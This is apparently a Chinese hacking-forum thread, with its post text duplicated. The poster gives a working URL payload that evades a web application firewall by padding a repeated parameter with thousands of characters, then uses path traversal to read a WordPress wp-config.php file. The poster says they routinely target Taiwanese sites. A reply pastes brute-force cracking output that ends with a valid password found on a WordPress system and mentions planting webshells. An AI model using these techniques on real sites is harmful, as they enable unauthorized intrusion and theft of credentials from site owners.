PHP加溢出 弄死WAF.
...今天遇到一个很奇葩的WAF.
顺问这个是什么WAF.. 搞台湾的站经常出现这个,而且搜索发现EMS也是用这个防火墙.应该算是知名的.
url 格式 http://www.xxx.com/123.php?style=../../wp-config.php&edit
当url 出现2个../../的时候就会被拦载,试过变换为 .././../也拦了.
根据php说明环境是php apache 只取最后出现的.
突破办法 http://www.xxx.com/123.php?style=0xAAAAAAAAAAA.(N个AAA).&style=../../wp-config.php&edit
网上推荐一般用1000个A以上,但我测试 需要用到2000多个.
猜想应该跟防火墙性能有关.无限加A就是,直到溢死.
会被踩么,最近t00ls被踩的N多.
顺问这个是什么WAF.. 搞台湾的站经常出现这个,而且搜索发现EMS也是用这个防火墙.应该算是知名的.
url 格式 http://www.xxx.com/123.php?style=../../wp-config.php&edit
当url 出现2个../../的时候就会被拦载,试过变换为 .././../也拦了.
根据php说明环境是php apache 只取最后出现的.
突破办法 http://www.xxx.com/123.php?style=0xAAAAAAAAAAA.(N个AAA).&style=../../wp-config.php&edit
网上推荐一般用1000个A以上,但我测试 需要用到2000多个.
猜想应该跟防火墙性能有关.无限加A就是,直到溢死.
会被踩么,最近t00ls被踩的N多.
关于作者
评论27次
这是啥工具,这么快? 用的啥字典?
。。。。。
酱紫 不错
啊 这个太熟悉了
这个爆破. wordpress mu的xi统, 常规提webshell都用不了. [STATUS] 630.87 tries/min, 1392329 tries in 36:47h, 1305280 todo in 34:30h, 16 active [STATUS] 630.12 tries/min, 1400764 tries in 37:03h, 1296845 todo in 34:19h, 16 active [STATUS] 629.37 tries/min, 1409152 tries in 37:19h, 1288457 todo in 34:08h, 16 active [STATUS] 628.59 tries/min, 1417474 tries in 37:35h, 1280135 todo in 33:57h, 16 active [STATUS] 627.97 tries/min, 1426109 tries in 37:51h, 1271500 todo in 33:45h, 16 active [STATUS] 627.29 tries/min, 1434603 tries in 38:07h, 1263006 todo in 33:34h, 16 active [STATUS] 626.73 tries/min, 1443365 tries in 38:23h, 1254244 todo in 33:22h, 16 active [STATUS] 626.08 tries/min, 1451869 tries in 38:39h, 1245740 todo in 33:10h, 16 active [STATUS] 625.44 tries/min, 1460403 tries in 38:55h, 1237206 todo in 32:59h, 16 active [STATUS] 624.82 tries/min, 1468956 tries in 39:11h, 1228653 todo in 32:47h, 16 active [STATUS] 624.21 tries/min, 1477512 tries in 39:27h, 1220097 todo in 32:35h, 16 active [STATUS] 623.64 tries/min, 1486123 tries in 39:43h, 1211486 todo in 32:23h, 16 active 1 of 1 target successfully completed, 1 valid password found
弱弱的问下,wp怎么进后台的……